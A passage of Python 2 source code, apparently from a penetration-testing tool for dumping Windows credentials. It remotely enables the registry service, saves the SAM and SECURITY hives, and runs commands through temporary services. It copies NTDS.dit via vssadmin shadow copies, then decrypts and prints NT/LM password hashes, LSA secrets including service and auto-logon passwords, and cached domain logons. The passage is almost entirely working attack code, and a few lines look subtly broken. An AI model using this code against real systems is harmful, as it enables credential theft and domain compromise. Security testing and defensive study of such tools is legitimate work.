('NTHashOffset','<L=0'),
('NTHashLength','<L=0'),
('Unknown14','<L=0'),
('Unknown15','24s=""'),
('Data',':=""'),
)
class NL_RECORD(Structure):
structure = (
('UserLength','<H=0'),
('DomainNameLength','<H=0'),
('EffectiveNameLength','<H=0'),
('FullNameLength','<H=0'),
('MetaData','52s=""'),
('FullDomainLength','<H=0'),
('Length2','<H=0'),
('CH','16s=""'),
('T','16s=""'),
('EncryptedData',':'),
)
class SAMR_RPC_SID_IDENTIFIER_AUTHORITY(Structure):
structure = (
('Value','6s'),
)
class SAMR_RPC_SID(Structure):
structure = (
('Revision','<B'),
('SubAuthorityCount','<B'),
('IdentifierAuthority',':',SAMR_RPC_SID_IDENTIFIER_AUTHORITY),
('SubLen','_-SubAuthority','self["SubAuthorityCount"]*4'),
('SubAuthority',':'),
)
def formatCanonical(self):
ans = 'S-%d-%d' % (self['Revision'], ord(self['IdentifierAuthority']['Value'][5]))
for i in range(self['SubAuthorityCount']):
ans += '-%d' % ( unpack('>L',self['SubAuthority'][i*4:i*4+4])[0])
return ans
class LSA_SECRET_BLOB(Structure):
structure = (
('Length','<L=0'),
('Unknown','12s=""'),
('_Secret','_-Secret','self["Length"]'),
('Secret',':'),
('Remaining',':'),
)
class LSA_SECRET(Structure):
structure = (
('Version','<L=0'),
('EncKeyID','16s=""'),
('EncAlgorithm','<L=0'),
('Flags','<L=0'),
('EncryptedData',':'),
)
class LSA_SECRET_XP(Structure):
structure = (
('Length','<L=0'),
('Version','<L=0'),
('_Secret','_-Secret', 'self["Length"]'),
('Secret', ':'),
)
# Classes
class RemoteFile():
def __init__(self, smbConnection, fileName):
self.__smbConnection = smbConnection
self.__fileName = fileName
self.__tid = self.__smbConnection.connectTree('ADMIN$')
self.__fid = None
self.__currentOffset = 0
def open(self):
self.__fid = self.__smbConnection.openFile(self.__tid, self.__fileName)
def seek(self, offset, whence):
# Implement whence, for now it's always from the beginning of the file
if whence == 0:
self.__currentOffset = offset
def read(self, bytesToRead):
if bytesToRead > 0:
data = self.__smbConnection.readFile(self.__tid, self.__fid, self.__currentOffset, bytesToRead)
self.__currentOffset += len(data)
return data
return ''
def close(self):
if self.__fid is not None:
self.__smbConnection.closeFile(self.__tid, self.__fid)
self.__smbConnection.deleteFile('ADMIN$', self.__fileName)
self.__fid = None
def tell(self):
return self.__currentOffset
def __str__(self):
return "\\\\%s\\ADMIN$\\%s" % (self.__smbConnection.getRemoteHost(), self.__fileName)
class RemoteOperations:
def __init__(self, smbConnection):
self.__smbConnection = smbConnection
self.__smbConnection.setTimeout(5*60)
self.__serviceName = 'RemoteRegistry'
self.__stringBindingWinReg = r'ncacn_np:445[\pipe\winreg]'
self.__stringBindingSvcCtl = r'ncacn_np:445[\pipe\svcctl]'
self.__rrp = None
self.__bootKey = ''
self.__disabled = False
self.__shouldStop = False
self.__started = False
self.__scmr = None
self.__regHandle = None
self.__batchFile = '%TEMP%\\execute.bat'
self.__shell = '%COMSPEC% /Q /c '
self.__output = '%SYSTEMROOT%\\Temp\\__output'
self.__answerTMP = ''
self.__tmpServiceName = None
self.__serviceDeleted = False
def __connectSvcCtl(self):
rpc = transport.DCERPCTransportFactory(self.__stringBindingSvcCtl)
rpc.set_smb_connection(self.__smbConnection)
self.__scmr = rpc.get_dce_rpc()
self.__scmr.connect()
self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
def __connectWinReg(self):
rpc = transport.DCERPCTransportFactory(self.__stringBindingWinReg)
rpc.set_smb_connection(self.__smbConnection)
self.__rrp = rpc.get_dce_rpc()
self.__rrp.connect()
self.__rrp.bind(rrp.MSRPC_UUID_RRP)
def getMachineNameAndDomain(self):
if self.__smbConnection.getServerName() == '':
# No serverName.. this is either because we're doing Kerberos
# or not receiving that data during the login process.
# Let's try getting it through RPC
rpc = transport.DCERPCTransportFactory(r'ncacn_np:445[\pipe\wkssvc]')
rpc.set_smb_connection(self.__smbConnection)
dce = rpc.get_dce_rpc()
dce.connect()
dce.bind(wkst.MSRPC_UUID_WKST)
resp = wkst.hNetrWkstaGetInfo(dce, 100)
dce.disconnect()
return resp['WkstaInfo']['WkstaInfo100']['wki100_computername'][:-1], resp['WkstaInfo']['WkstaInfo100']['wki100_langroup'][:-1]
else:
return self.__smbConnection.getServerName(), self.__smbConnection.getServerDomain()
def getDefaultLoginAccount(self):
try:
ans = rrp.hBaseRegOpenKey(self.__rrp, self.__regHandle, 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon')
keyHandle = ans['phkResult']
dataType, dataValue = rrp.hBaseRegQueryValue(self.__rrp, keyHandle, 'DefaultUserName')
username = dataValue[:-1]
dataType, dataValue = rrp.hBaseRegQueryValue(self.__rrp, 'DefaultDomainName')
domain = dataValue[:-1]
rrp.hBaseRegCloseKey(self.__rrp, keyHandle)
if len(domain) > 0:
return '%s\\%s' % (domain,username)
else:
return username
except Exception, e:
return None
def getServiceAccount(self, serviceName):
try:
# Open the service
ans = scmr.hROpenServiceW(self.__scmr, self.__scManagerHandle, serviceName)
serviceHandle = ans['lpServiceHandle']
resp = scmr.hRQueryServiceConfigW(self.__scmr, serviceHandle)
account = resp['lpServiceConfig']['lpServiceStartName'][:-1]
scmr.hRCloseServiceHandle(self.__scmr, serviceHandle)
if account.startswith('.\\'):
account = account[2:]
return account
except Exception, e:
logging.error(e)
return None
def __checkServiceStatus(self):
# Open SC Manager
ans = scmr.hROpenSCManagerW(self.__scmr)
self.__scManagerHandle = ans['lpScHandle']
# Now let's open the service
ans = scmr.hROpenServiceW(self.__scmr, self.__scManagerHandle, self.__serviceName)
self.__serviceHandle = ans['lpServiceHandle']
# Let's check its status
ans = scmr.hRQueryServiceStatus(self.__scmr, self.__serviceHandle)
if ans['lpServiceStatus']['dwCurrentState'] == scmr.SERVICE_STOPPED:
logging.info('Service %s is in stopped state'% self.__serviceName)
self.__shouldStop = True
self.__started = False
elif ans['lpServiceStatus']['dwCurrentState'] == scmr.SERVICE_RUNNING:
logging.debug('Service %s is already running'% self.__serviceName)
self.__shouldStop = False
self.__started = True
else:
raise Exception('Unknown service state 0x%x - Aborting' % ans['CurrentState'])
# Let's check its configuration if service is stopped, maybe it's disabled :s
if self.__started == False:
ans = scmr.hRQueryServiceConfigW(self.__scmr,self.__serviceHandle)
if ans['lpServiceConfig']['dwStartType'] == 0x4:
logging.info('Service %s is disabled, enabling it'% self.__serviceName)
self.__disabled = True
scmr.hRChangeServiceConfigW(self.__scmr, self.__serviceHandle, dwStartType = 0x3)
logging.info('Starting service %s' % self.__serviceName)
scmr.hRStartServiceW(self.__scmr,self.__serviceHandle)
time.sleep(1)
def enableRegistry(self):
self.__connectSvcCtl()
self.__checkServiceStatus()
self.__connectWinReg()
def __restore(self):
# First of all stop the service if it was originally stopped
if self.__shouldStop is True:
logging.info('Stopping service %s' % self.__serviceName)
scmr.hRControlService(self.__scmr, self.__serviceHandle, scmr.SERVICE_CONTROL_STOP)
if self.__disabled is True:
logging.info('Restoring the disabled state for service %s' % self.__serviceName)
scmr.hRChangeServiceConfigW(self.__scmr, self.__serviceHandle, dwStartType = 0x4)
if self.__serviceDeleted is False:
# Check again the service we created does not exist, starting a new connection
# Why?.. Hitting CTRL+C might break the whole existing DCE connection
try:
rpc = transport.DCERPCTransportFactory(r'ncacn_np:%s[\pipe\svcctl]' % self.__smbConnection.getRemoteHost())
if hasattr(rpc, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpc.set_credentials(*self.__smbConnection.getCredentials())
self.__scmr = rpc.get_dce_rpc()
self.__scmr.connect()
self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
# Open SC Manager
ans = scmr.hROpenSCManagerW(self.__scmr)
self.__scManagerHandle = ans['lpScHandle']
# Now let's open the service
scmr.hROpenServiceW(self.__scmr, self.__scManagerHandle, self.__tmpServiceName)
service = resp['lpServiceHandle']
scmr.hRDeleteService(self.__scmr, service)
scmr.hRControlService(self.__scmr, service, scmr.SERVICE_CONTROL_STOP)
scmr.hRCloseServiceHandle(self.__scmr, service)
scmr.hRCloseServiceHandle(self.__scmr, self.__serviceHandle)
scmr.hRCloseServiceHandle(self.__scmr, self.__scManagerHandle)
rpc.disconnect()
except Exception, e:
# If service is stopped it'll trigger an exception
# If service does not exist it'll trigger an exception
# So. we just wanna be sure we delete it, no need to
# show this exception message
pass
def finish(self):
self.__restore()
self.__rrp.disconnect()
self.__scmr.disconnect()
def getBootKey(self):
bootKey = ''
ans = rrp.hOpenLocalMachine(self.__rrp)
self.__regHandle = ans['phKey']
for key in ['JD','Skew1','GBG','Data']:
logging.debug('Retrieving class info for %s'% key)
ans = rrp.hBaseRegOpenKey(self.__rrp, self.__regHandle, 'SYSTEM\\CurrentControlSet\\Control\\Lsa\\%s' % key)
keyHandle = ans['phkResult']
ans = rrp.hBaseRegQueryInfoKey(self.__rrp,keyHandle)
bootKey = bootKey + ans['lpClassOut'][:-1]
rrp.hBaseRegCloseKey(self.__rrp, keyHandle)
transforms = [ 8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7 ]
bootKey = bootKey.decode('hex')
for i in xrange(len(bootKey)):
self.__bootKey += bootKey[transforms[i]]
logging.info('Target system bootKey: 0x%s' % self.__bootKey.encode('hex'))
return self.__bootKey
def checkNoLMHashPolicy(self):
logging.debug('Checking NoLMHash Policy')
ans = rrp.hOpenLocalMachine(self.__rrp)
self.__regHandle = ans['phKey']
ans = rrp.hBaseRegOpenKey(self.__rrp, self.__regHandle, 'SYSTEM\\CurrentControlSet\\Control\\Lsa')
keyHandle = ans['phkResult']
try:
dataType, noLMHash = rrp.hBaseRegQueryValue(self.__rrp, keyHandle, 'NoLmHash')
except:
noLMHash = 0
if noLMHash != 1:
logging.debug('LMHashes are being stored')
return False
logging.debug('LMHashes are NOT being stored')
return True
def __retrieveHive(self, hiveName):
tmpFileName = ''.join([random.choice(string.letters) for i in range(8)]) + '.tmp'
ans = rrp.hOpenLocalMachine(self.__rrp)
regHandle = ans['phKey']
try:
ans = rrp.hBaseRegCreateKey(self.__rrp, regHandle, hiveName)
except:
raise Exception("Can't open %s hive" % hiveName)
keyHandle = ans['phkResult']
resp = rrp.hBaseRegSaveKey(self.__rrp, keyHandle, tmpFileName)
rrp.hBaseRegCloseKey(self.__rrp, keyHandle)
rrp.hBaseRegCloseKey(self.__rrp, regHandle)
# Now let's open the remote file, so it can be read later
remoteFileName = RemoteFile(self.__smbConnection, 'SYSTEM32\\'+tmpFileName)
return remoteFileName
def saveSAM(self):
logging.debug('Saving remote SAM database')
return self.__retrieveHive('SAM')
def saveSECURITY(self):
logging.debug('Saving remote SECURITY database')
return self.__retrieveHive('SECURITY')
def __executeRemote(self, data):
self.__tmpServiceName = ''.join([random.choice(string.letters) for i in range(8)]).encode('utf-16le')
command = self.__shell + 'echo ' + data + ' ^> ' + self.__output + ' > ' + self.__batchFile + ' & ' + self.__shell + self.__batchFile
command += ' & ' + 'del ' + self.__batchFile
self.__serviceDeleted = False
resp = scmr.hRCreateServiceW(self.__scmr, self.__scManagerHandle, self.__tmpServiceName, self.__tmpServiceName, lpBinaryPathName=command)
service = resp['lpServiceHandle']
try:
scmr.hRStartServiceW(self.__scmr, service)
except:
pass
scmr.hRDeleteService(self.__scmr, service)
self.__serviceDeleted = True
scmr.hRCloseServiceHandle(self.__scmr, service)
def __answer(self, data):
self.__answerTMP += data
def __getLastVSS(self):
self.__executeRemote('%COMSPEC% /C vssadmin list shadows')
time.sleep(5)
tries = 0
while True:
try:
self.__smbConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer)
break
except Exception, e:
if tries > 30:
# We give up
raise Exception('Too many tries trying to list vss shadows')
if str(e).find('SHARING') > 0:
# Stuff didn't finish yet.. wait more
time.sleep(5)
tries +=1
pass
else:
raise
lines = self.__answerTMP.split('\n')
lastShadow = ''
lastShadowFor = ''
# Let's find the last one
# The string used to search the shadow for drive. Wondering what happens
# in other languages
SHADOWFOR = 'Volume: ('
for line in lines:
if line.find('GLOBALROOT') > 0:
lastShadow = line[line.find('\\\\?'):][:-1]
elif line.find(SHADOWFOR) > 0:
lastShadowFor = line[line.find(SHADOWFOR)+len(SHADOWFOR):][:2]
self.__smbConnection.deleteFile('ADMIN$', 'Temp\\__output')
return lastShadow, lastShadowFor
def saveNTDS(self):
logging.info('Searching for NTDS.dit')
# First of all, let's try to read the target NTDS.dit registry entry
ans = rrp.hOpenLocalMachine(self.__rrp)
regHandle = ans['phKey']
try:
ans = rrp.hBaseRegOpenKey(self.__rrp, self.__regHandle, 'SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters')
keyHandle = ans['phkResult']
except:
# Can't open the registry path, assuming no NTDS on the other end
return None
try:
dataType, dataValue = rrp.hBaseRegQueryValue(self.__rrp, keyHandle, 'DSA Database file')
ntdsLocation = dataValue[:-1]
ntdsDrive = ntdsLocation[:2]
except:
# Can't open the registry path, assuming no NTDS on the other end
return None
rrp.hBaseRegCloseKey(self.__rrp, keyHandle)
rrp.hBaseRegCloseKey(self.__rrp, regHandle)
logging.info('Registry says NTDS.dit is at %s. Calling vssadmin to get a copy. This might take some time' % (ntdsLocation))
# Get the list of remote shadows
shadow, shadowFor = self.__getLastVSS()
if shadow == '' or (shadow != '' and shadowFor != ntdsDrive):
# No shadow, create one
self.__executeRemote('%%COMSPEC%% /C vssadmin create shadow /For=%s' % ntdsDrive)
shadow, shadowFor = self.__getLastVSS()
shouldRemove = True
if shadow == '':
raise Exception('Could not get a VSS')
else:
shouldRemove = False
# Now copy the ntds.dit to the temp directory
tmpFileName = ''.join([random.choice(string.letters) for i in range(8)]) + '.tmp'
self.__executeRemote('%%COMSPEC%% /C copy %s%s %%SYSTEMROOT%%\\Temp\\%s' % (shadow, ntdsLocation[2:], tmpFileName))
if shouldRemove is True:
self.__executeRemote('%%COMSPEC%% /C vssadmin delete shadows /For=%s /Quiet' % ntdsDrive)
self.__smbConnection.deleteFile('ADMIN$', 'Temp\\__output')
remoteFileName = RemoteFile(self.__smbConnection, 'Temp\\%s' % tmpFileName)
return remoteFileName
class CryptoCommon:
# Common crypto stuff used over different classes
def transformKey(self, InputKey):
# Section 2.2.11.1.2 Encrypting a 64-Bit Block with a 7-Byte Key
OutputKey = []
OutputKey.append( chr(ord(InputKey[0]) >> 0x01) )
OutputKey.append( chr(((ord(InputKey[0])&0x01)<<6) | (ord(InputKey[1])>>2)) )
OutputKey.append( chr(((ord(InputKey[1])&0x03)<<5) | (ord(InputKey[2])>>3)) )
OutputKey.append( chr(((ord(InputKey[2])&0x07)<<4) | (ord(InputKey[3])>>4)) )
OutputKey.append( chr(((ord(InputKey[3])&0x0F)<<3) | (ord(InputKey[4])>>5)) )
OutputKey.append( chr(((ord(InputKey[4])&0x1F)<<2) | (ord(InputKey[5])>>6)) )
OutputKey.append( chr(((ord(InputKey[5])&0x3F)<<1) | (ord(InputKey[6])>>7)) )
OutputKey.append( chr(ord(InputKey[6]) & 0x7F) )
for i in range(8):
OutputKey[i] = chr((ord(OutputKey[i]) << 1) & 0xfe)
return "".join(OutputKey)
def deriveKey(self, baseKey):
# 2.2.11.1.3 Deriving Key1 and Key2 from a Little-Endian, Unsigned Integer Key
# Let I be the little-endian, unsigned integer.
# Let I[X] be the Xth byte of I, where I is interpreted as a zero-base-index array of bytes.
# Note that because I is in little-endian byte order, I[0] is the least significant byte.
# Key1 is a concatenation of the following values: I[0], I[1], I[2], I[3], I[0], I[1], I[2].
# Key2 is a concatenation of the following values: I[3], I[0], I[1], I[2], I[3], I[0], I[1]
key = pack('<L',baseKey)
key1 = key[0] + key[1] + key[2] + key[3] + key[0] + key[1] + key[2]
key2 = key[3] + key[0] + key[1] + key[2] + key[3] + key[0] + key[1]
return self.transformKey(key1),self.transformKey(key2)
class OfflineRegistry:
def __init__(self, hiveFile = None, isRemote = False):
self.__hiveFile = hiveFile
if self.__hiveFile is not None:
self.__registryHive = winregistry.Registry(self.__hiveFile, isRemote)
def enumKey(self, searchKey):
parentKey = self.__registryHive.findKey(searchKey)
if parentKey is None:
return
keys = self.__registryHive.enumKey(parentKey)
return keys
def enumValues(self, searchKey):
key = self.__registryHive.findKey(searchKey)
if key is None:
return
values = self.__registryHive.enumValues(key)
return values
def getValue(self, keyValue):
value = self.__registryHive.getValue(keyValue)
if value is None:
return
return value
def getClass(self, className):
value = self.__registryHive.getClass(className)
if value is None:
return
return value
def finish(self):
if self.__hiveFile is not None:
# Remove temp file and whatever else is needed
self.__registryHive.close()
class SAMHashes(OfflineRegistry):
def __init__(self, samFile, bootKey, isRemote = False):
OfflineRegistry.__init__(self, samFile, isRemote)
self.__samFile = samFile
self.__hashedBootKey = ''
self.__bootKey = bootKey
self.__cryptoCommon = CryptoCommon()
self.__itemsFound = {}
def MD5(self, data):
md5 = hashlib.new('md5')
md5.update(data)
return md5.digest()
def getHBootKey(self):
logging.debug('Calculating HashedBootKey from SAM')
QWERTY = "!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%\0"
DIGITS = "0123456789012345678901234567890123456789\0"
F = self.getValue(ntpath.join('SAM\Domains\Account','F'))[1]
domainData = DOMAIN_ACCOUNT_F(F)
rc4Key = self.MD5(domainData['Key0']['Salt'] + QWERTY + self.__bootKey + DIGITS)
rc4 = ARC4.new(rc4Key)
self.__hashedBootKey = rc4.encrypt(domainData['Key0']['Key']+domainData['Key0']['CheckSum'])
# Verify key with checksum
checkSum = self.MD5( self.__hashedBootKey[:16] + DIGITS + self.__hashedBootKey[:16] + QWERTY)
if checkSum != self.__hashedBootKey[16:]:
raise Exception('hashedBootKey CheckSum failed, Syskey startup password probably in use! :(')
def __decryptHash(self, rid, cryptedHash, constant):
# Section 2.2.11.1.1 Encrypting an NT or LM Hash Value with a Specified Key
# plus hashedBootKey stuff
Key1,Key2 = self.__cryptoCommon.deriveKey(rid)
Crypt1 = DES.new(Key1, DES.MODE_ECB)
Crypt2 = DES.new(Key2, DES.MODE_ECB)
rc4Key = self.MD5( self.__hashedBootKey[:0x10] + pack("<L",rid) + constant )
rc4 = ARC4.new(rc4Key)
key = rc4.encrypt(cryptedHash)
decryptedHash = Crypt1.decrypt(key[:8]) + Crypt2.decrypt(key[8:])
return decryptedHash
def dump(self):
NTPASSWORD = "NTPASSWORD\0"
LMPASSWORD = "LMPASSWORD\0"
if self.__samFile is None:
# No SAM file provided
return
logging.info('Dumping local SAM hashes (uid:rid:lmhash:nthash)')
self.getHBootKey()
usersKey = 'SAM\\Domains\\Account\\Users'
# Enumerate all the RIDs
rids = self.enumKey(usersKey)
# Remove the Names item
try:
rids.remove('Names')
except:
pass
for rid in rids:
userAccount = USER_ACCOUNT_V(self.getValue(ntpath.join(usersKey,rid,'V'))[1])
rid = int(rid,16)
baseOffset = len(USER_ACCOUNT_V())
V = userAccount['Data']
userName = V[userAccount['NameOffset']:userAccount['NameOffset']+userAccount['NameLength']].decode('utf-16le')
if userAccount['LMHashLength'] == 20:
encLMHash = V[userAccount['LMHashOffset']+4:userAccount['LMHashOffset']+userAccount['LMHashLength']]
else:
encLMHash = ''
if userAccount['NTHashLength'] == 20:
encNTHash = V[userAccount['NTHashOffset']+4:userAccount['NTHashOffset']+userAccount['NTHashLength']]
else:
encNTHash = ''
lmHash = self.__decryptHash(rid, encLMHash, LMPASSWORD)
ntHash = self.__decryptHash(rid, encNTHash, NTPASSWORD)
if lmHash == '':
lmHash = ntlm.LMOWFv1('','')
if ntHash == '':
ntHash = ntlm.NTOWFv1('','')
answer = "%s:%d:%s:%s:::" % (userName, rid, lmHash.encode('hex'), ntHash.encode('hex'))
self.__itemsFound[rid] = answer
print answer
def export(self, fileName):
if len(self.__itemsFound) > 0:
items = sorted(self.__itemsFound)
fd = open(fileName+'.sam','w+')
for item in items:
fd.write(self.__itemsFound[item]+'\n')
fd.close()
class LSASecrets(OfflineRegistry):
def __init__(self, securityFile, bootKey, remoteOps = None, isRemote = False):
OfflineRegistry.__init__(self,securityFile, isRemote)
self.__hashedBootKey = ''
self.__bootKey = bootKey
self.__LSAKey = ''
self.__NKLMKey = ''
self.__isRemote = isRemote
self.__vistaStyle = True
self.__cryptoCommon = CryptoCommon()
self.__securityFile = securityFile
self.__remoteOps = remoteOps
self.__cachedItems = []
self.__secretItems = []
def MD5(self, data):
md5 = hashlib.new('md5')
md5.update(data)
return md5.digest()
def __sha256(self, key, value, rounds=1000):
sha = hashlib.sha256()
sha.update(key)
for i in range(1000):
sha.update(value)
return sha.digest()
def __decryptAES(self, key, value, iv='\x00'*16):
plainText = ''
if iv != '\x00'*16:
aes256 = AES.new(key,AES.MODE_CBC, iv)
for index in range(0, len(value), 16):
if iv == '\x00'*16:
aes256 = AES.new(key,AES.MODE_CBC, iv)
cipherBuffer = value[index:index+16]
# Pad buffer to 16 bytes
if len(cipherBuffer) < 16:
cipherBuffer += '\x00' * (16-len(cipherBuffer))
plainText += aes256.decrypt(cipherBuffer)
return plainText
def __decryptSecret(self, key, value):
# [MS-LSAD] Section 5.1.2
plainText = ''
encryptedSecretSize = unpack('<I', value[:4])[0]
value = value[len(value)-encryptedSecretSize:]
key0 = key
for i in range(0, len(value), 8):
cipherText = value[:8]
tmpStrKey = key0[:7]
tmpKey = self.__cryptoCommon.transformKey(tmpStrKey)
Crypt1 = DES.new(tmpKey, DES.MODE_ECB)
plainText += Crypt1.decrypt(cipherText)
cipherText = cipherText[8:]
key0 = key0[7:]
value = value[8:]
# AdvanceKey
if len(key0) < 7:
key0 = key[len(key0):]
secret = LSA_SECRET_XP(plainText)
return (secret['Secret'])
def __decryptHash(self, key, value, iv):
hmac_md5 = HMAC.new(key,iv)
rc4key = hmac_md5.digest()
rc4 = ARC4.new(rc4key)
data = rc4.encrypt(value)
return data
def __decryptLSA(self, value):
if self.__vistaStyle is True:
# ToDo: There could be more than one LSA Keys
record = LSA_SECRET(value)
tmpKey = self.__sha256(self.__bootKey, record['EncryptedData'][:32])
plainText = self.__decryptAES(tmpKey, record['EncryptedData'][32:])
record = LSA_SECRET_BLOB(plainText)
self.__LSAKey = record['Secret'][52:][:32]
else:
md5 = hashlib.new('md5')
md5.update(self.__bootKey)
for i in range(1000):
md5.update(value[60:76])
tmpKey = md5.digest()
rc4 = ARC4.new(tmpKey)
plainText = rc4.decrypt(value[12:60])
self.__LSAKey = plainText[0x10:0x20]
def __getLSASecretKey(self):
logging.debug('Decrypting LSA Key')
# Let's try the key post XP
value = self.getValue('\\Policy\\PolEKList\\default')
if value is None:
logging.debug('PolEKList not found, trying PolSecretEncryptionKey')
# Second chance
value = self.getValue('\\Policy\\PolSecretEncryptionKey\\default')
self.__vistaStyle = False
if value is None:
# No way :(
return None
self.__decryptLSA(value[1])
def __getNLKMSecret(self):
logging.debug('Decrypting NL$KM')
value = self.getValue('\\Policy\\Secrets\\NL$KM\\CurrVal\\default')
if value is None:
raise Exception("Couldn't get NL$KM value")
if self.__vistaStyle is True:
record = LSA_SECRET(value[1])
tmpKey = self.__sha256(self.__LSAKey, record['EncryptedData'][:32])
self.__NKLMKey = self.__decryptAES(tmpKey, record['EncryptedData'][32:])
else:
self.__NKLMKey = self.__decryptSecret(self.__LSAKey, value[1])
def __pad(self, data):
if (data & 0x3) > 0:
return data + (data & 0x3)
else:
return data
def dumpCachedHashes(self):
if self.__securityFile is None:
# No SECURITY file provided
return
logging.info('Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)')
# Let's first see if there are cached entries
values = self.enumValues('\\Cache')
if values == None:
# No cache entries
return
try:
# Remove unnecesary value
values.remove('NL$Control')
except:
pass
self.__getLSASecretKey()
self.__getNLKMSecret()
for value in values:
logging.debug('Looking into %s' % value)
record = NL_RECORD(self.getValue(ntpath.join('\\Cache',value))[1])
if record['CH'] != 16 * '\x00':
if self.__vistaStyle is True:
plainText = self.__decryptAES(self.__NKLMKey[16:32], record['EncryptedData'], record['CH'])
else:
plainText = self.__decryptHash(self.__NKLMKey, record['EncryptedData'], record['CH'])
pass
encHash = plainText[:0x10]
plainText = plainText[0x48:]
userName = plainText[:record['UserLength']].decode('utf-16le')
plainText = plainText[self.__pad(record['UserLength']):]
domain = plainText[:record['DomainNameLength']].decode('utf-16le')
plainText = plainText[self.__pad(record['DomainNameLength']):]
domainLong = plainText[:self.__pad(record['FullDomainLength'])].decode('utf-16le')
answer = "%s:%s:%s:%s:::" % (userName, encHash.encode('hex'), domainLong, domain)
self.__cachedItems.append(answer)
print answer
def __printSecret(self, name, secretItem):
# Based on [MS-LSAD] section 3.1.1.4
# First off, let's discard NULL secrets.
if len(secretItem) == 0:
logging.debug('Discarding secret %s, NULL Data' % name)
return
# We might have secrets with zero
if secretItem.startswith('\x00\x00'):
logging.debug('Discarding secret %s, all zeros' % name)
return
upperName = name.upper()
logging.info('%s ' % name)
secret = ''
if upperName.startswith('_SC_'):
# Service name, a password might be there
# Let's first try to decode the secret
try:
strDecoded = secretItem.decode('utf-16le')
except:
pass
else:
# We have to get the account the service
# runs under
if self.__isRemote is True:
account = self.__remoteOps.getServiceAccount(name[4:])
if account is None:
secret = '(Unknown User):'
else:
secret = "%s:" % account
else:
# We don't support getting this info for local targets at the moment
secret = '(Unknown User):'
secret += strDecoded
elif upperName.startswith('DEFAULTPASSWORD'):
# defaults password for winlogon
# Let's first try to decode the secret
try:
strDecoded = secretItem.decode('utf-16le')
except:
pass
else:
# We have to get the account this password is for
if self.__isRemote is True:
account = self.__remoteOps.getDefaultLoginAccount()
if account is None:
secret = '(Unknown User):'
else:
secret = "%s:" % account
else:
# We don't support getting this info for local targets at the moment
secret = '(Unknown User):'
secret += strDecoded
elif upperName.startswith('ASPNET_WP_PASSWORD'):
try:
strDecoded = secretItem.decode('utf-16le')
except:
pass
else:
secret = 'ASPNET: %s' % strDecoded
elif upperName.startswith('$MACHINE.ACC'):
# compute MD4 of the secret.. yes.. that is the nthash? :-o
md4 = MD4.new()
md4.update(secretItem)
if self.__isRemote is True:
machine, domain = self.__remoteOps.getMachineNameAndDomain()
secret = "%s\\%s$:%s:%s:::" % (domain, machine, ntlm.LMOWFv1('','').encode('hex'), md4.digest().encode('hex'))
else:
secret = "$MACHINE.ACC: %s:%s" % (ntlm.LMOWFv1('','').encode('hex'), md4.digest().encode('hex'))
if secret != '':
print secret
self.__secretItems.append(secret)
else:
# Default print, hexdump
self.__secretItems.append('%s:%s' % (name, secretItem.encode('hex')))
hexdump(secretItem)
def dumpSecrets(self):
if self.__securityFile is None:
# No SECURITY file provided
return
logging.info('Dumping LSA Secrets')
# Let's first see if there are cached entries
keys = self.enumKey('\\Policy\\Secrets')
if keys == None:
# No entries
return
try:
# Remove unnecesary value
keys.remove('NL$Control')
except:
pass
if self.__LSAKey == '':
self.__getLSASecretKey()
for key in keys:
logging.debug('Looking into %s' % key)
value = self.getValue('\\Policy\\Secrets\\%s\\CurrVal\\default' % key)
if value is not None:
if self.__vistaStyle is True:
record = LSA_SECRET(value[1])
tmpKey = self.__sha256(self.__LSAKey, record['EncryptedData'][:32])
plainText = self.__decryptAES(tmpKey, record['EncryptedData'][32:])
record = LSA_SECRET_BLOB(plainText)
secret = record['Secret']
else:
secret = self.__decryptSecret(self.__LSAKey, value[1])
self.__printSecret(key, secret)
def exportSecrets(self, fileName):
if len(self.__secretItems) > 0:
fd = open(fileName+'.secrets','w+')
for item in self.__secretItems:
fd.write(item+'\n')
fd.close()
def exportCached(self, fileName):
if len(self.__cachedItems) > 0:
fd = open(fileName+'.cached','w+')
for item in self.__cachedItems:
fd.write(item+'\n')
fd.close()
class NTDSHashes():
NAME_TO_INTERNAL = {
'uSNCreated':'ATTq131091',
'uSNChanged':'ATTq131192',
'name':'ATTm3',
'objectGUID':'ATTk589826',
'objectSid':'ATTr589970',
'userAccountControl':'ATTj589832',
'primaryGroupID':'ATTj589922',
'accountExpires':'ATTq589983',
'logonCount':'ATTj589993',
'sAMAccountName':'ATTm590045',
'sAMAccountType':'ATTj590126',
'lastLogonTimestamp':'ATTq589876',
'userPrincipalName':'ATTm590480',
'unicodePwd':'ATTk589914',
'dBCSPwd':'ATTk589879',
'ntPwdHistory':'ATTk589918',
'lmPwdHistory':'ATTk589984',
'pekList':'ATTk590689',
'supplementalCredentials':'ATTk589949',
}
KERBEROS_TYPE = {
1:'dec-cbc-crc',
3:'des-cbc-md5',
17:'aes128-cts-hmac-sha1-96',
18:'aes256-cts-hmac-sha1-96',
0xffffff74:'rc4_hmac',
}
INTERNAL_TO_NAME = dict((v,k) for k,v in NAME_TO_INTERNAL.iteritems())
SAM_NORMAL_USER_ACCOUNT = 0x30000000
SAM_MACHINE_ACCOUNT = 0x30000001
SAM_TRUST_ACCOUNT = 0x30000002
ACCOUNT_TYPES = ( SAM_NORMAL_USER_ACCOUNT, SAM_MACHINE_ACCOUNT, SAM_TRUST_ACCOUNT)
class PEK_KEY(Structure):
structure = (
('Header','8s=""'),
('KeyMaterial','16s=""'),
('EncryptedPek','52s=""'),
)
class CRYPTED_HASH(Structure):
structure = (
('Header','8s=""'),
('KeyMaterial','16s=""'),
('EncryptedHash','16s=""'),
)
class CRYPTED_HISTORY(Structure):
structure = (
('Header','8s=""'),
('KeyMaterial','16s=""'),
('EncryptedHash',':'),
)
class CRYPTED_BLOB(Structure):
structure = (
('Header','8s=""'),
('KeyMaterial','16s=""'),
('EncryptedHash',':'),
)
def __init__(self, ntdsFile, bootKey, isRemote = False, history = False, noLMHash = True):
self.__bootKey = bootKey
self.__NTDS = ntdsFile
self.__history = history
self.__noLMHash = noLMHash
if self.__NTDS is not None:
self.__ESEDB = ESENT_DB(ntdsFile, isRemote = isRemote)
self.__cursor = self.__ESEDB.openTable('datatable')
self.__tmpUsers = list()
self.__PEK = None
